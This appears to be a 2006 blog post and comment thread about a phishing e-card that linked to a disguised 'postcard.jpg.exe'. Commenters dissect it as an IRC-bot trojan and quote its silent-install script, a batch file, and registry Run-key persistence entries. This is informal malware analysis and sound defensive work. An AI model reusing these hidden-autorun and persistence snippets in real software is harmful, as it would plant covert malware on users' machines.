Well, that was cute.

Oct. 30th, 2006 12:10 am
maradydd: (Default)
[personal profile] maradydd
Just got an amusing bit of spam: a "you've received an electronic postcard" note purporting to be from http://www.all-yours.net, actually originating from silverline-s27.de. As with your average PayPal/eBay phishing scam, the "pick up your postcard" link goes to an entirely different location, in this case http://mortalcity.com/postcard.jpg.exe. (Nice try, jokers; the power of viewing all my mail in plaintext repels you.)

I haven't gone to the trouble of decompiling the binary yet, as I don't know the first thing about malware analysis and don't presently have time to learn. If any of my Gentle Readers would care to ([livejournal.com profile] foxgrrl? [livejournal.com profile] ernunnos?), though, I'd love to hear what's in it -- botnet, I'm guessing.

Anywho, mortalcity.com appears on the surface to be a legitimate small webhosting company -- at least, the domains they claim to host do in fact appear to be hosted there -- so I forwarded the spam to the admin, just in case his server's been pwned or something. And now you all know about a variation on the phishing theme, so I've done my service to society for the night.

EDIT: No reply from the admin, but the malware's gone. Huzzah.
Tags:
Flat | Top-Level Comments Only

(no subject)

Date: 2006-10-30 09:25 am (UTC)
foxgrrl: (launch codes)
From: [personal profile] foxgrrl
It's a self-extracting RAR archive, with an IRC bot in it. I haven't analyzed it yet, beyond this: 
SFX Archive mortalcity.com/postcard.jpg.exe

Comment: ete pula ai vazuto?

Path=%systemroot%\system32\
SavePath
Setup=%systemroot%\system32\sup.bat
Setup=%systemroot%\system32\explorer.exe
Silent=1
Overwrite=1

 Name             Size   Packed Ratio  Date   Time     Attr      CRC   Meth Ver
-------------------------------------------------------------------------------
 mirc.ico         5694      369   6% 07-11-04 00:28  .....A.   DC0D9792 m3f 2.9
 mirc.ini         3681     1722  46% 27-10-06 18:26  .....A.   C108478A m3f 2.9
 nicks.txt      140617    47040  33% 25-06-05 00:49  .....A.   7876A62C m3f 2.9
 remote.ini         48       48 100% 27-10-06 18:26  .....A.   5EB17835 m0f 2.9
 script.ini       8399     2057  24% 27-10-06 18:26  .....A.   B59C1162 m3f 2.9
 servers.ini      1473      350  23% 26-11-05 12:46  .....A.   7E4A5174 m3f 2.9
 sup.bat            28       28 100% 05-12-04 09:14  .....A.   EF7B6A23 m0f 2.9
 sup.reg           174      152  87% 25-06-05 01:36  .....A.   A4977AFB m3f 2.9
 users.ini         177      122  68% 27-10-06 18:23  .....A.   D944EE16 m3f 2.9
 aliases.ini        11       11 100% 15-02-04 00:28  .....A.   C2FEA823 m0f 2.9
 control.ini        68       68 100% 27-10-06 18:26  .....A.   E27CE5AE m0f 2.9
 explorer.exe  1790464   628285  35% 23-02-04 21:26  .....A.   4A0890E0 m3f 2.9
-------------------------------------------------------------------------------
   12          1950834   680252  34%


Well, ok, I looked just a little… "sup.bat" is this:


  19%@regedit /s sup.reg
@exit


And "sup.reg" is:

  19%REGEDIT4
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"taskmgr"="C:\\WINNT\\system32\\explorer.exe"
"IExplorer"="C:\\WINDOWS\\system32\\explorer.exe"


The "explorer.exe" binary, has this useful blob of XML in the last section:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="mIRC.mIRC.mIRC" type="win32"/>>lt;description>Internet Relay Chat Software</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*"/></dependentAssembly></dependency></assembly>


I'm not really that familiar with mirc, so I don't know if stuff like:

[ident]
active=yes
userid=kaelyn
system=UNIX
port=113
…
[mirc]
user=pyntul^^
nick=Rp1jOj8iE
anick=St7xFf3iM
email=sahae
host=diemen.nl.eu.undernet.orgSERVER:diemen.nl.eu.undernet.org:6666
…


… in "mirc.ini" is default or not.

(no subject)

Date: 2006-10-30 09:51 am (UTC)
From: [identity profile] maradydd.livejournal.com
Heh. I wonder if it tries to auto-download a copy of mIRC, or just crassly assumes that the user already has it installed?

Thanks for checking it out. I bow before your superior knowledge, and will happily stand you a beer next time the opportunity arises.

(no subject)

Date: 2006-10-30 11:06 am (UTC)
From: (Anonymous)
Oh, there is a copy of mIRC included. It's called "explorer.exe". Also, why am I still awake?

(no subject)

Date: 2006-10-30 12:22 pm (UTC)
From: [identity profile] crabbyolbastard.livejournal.com
postcard.jpg.exe is a sfx RAR archive. The archive contains 15 files. The file svchost.exe is a virus infected mIRC client (v6.0.3.0). I'm sure that wasn't intended because it is just stupid to spread trojan packages infected with old and therefore well known viruses

# postcard.jpg.exe/data.rar/script.ini - infected
by Backdoor.IRC.Zapchast
# postcard.jpg.exe/data.rar/svchost.exe - infected by Virus.Win32.Parite.b
# postcard.jpg.exe/data.rar/sup.reg - infected by Backdoor.IRC.Zapchast

lol not so stupid after all :D

Date: 2007-12-07 10:55 am (UTC)
From: (Anonymous)
My one client just got this one, ... the corporate eTrust antivirus is crap what they had, did not stop nothing.

Luckily i installed eset now :P

she used cute webbased mail client what opens active html emails automatically :D:D

WaffaDrunker

Re: lol not so stupid after all :D

Date: 2007-12-07 11:39 am (UTC)
From: [identity profile] maradydd.livejournal.com
Gah. HTML email is the bane of my existence.
Flat | Top-Level Comments Only

Profile

maradydd: (Default)
maradydd

September 2010

S M T W T F S
   1234
567891011
12131415 161718
19202122232425
26 27282930  

Most Popular Tags

Page Summary

Style Credit

Expand Cut Tags

No cut tags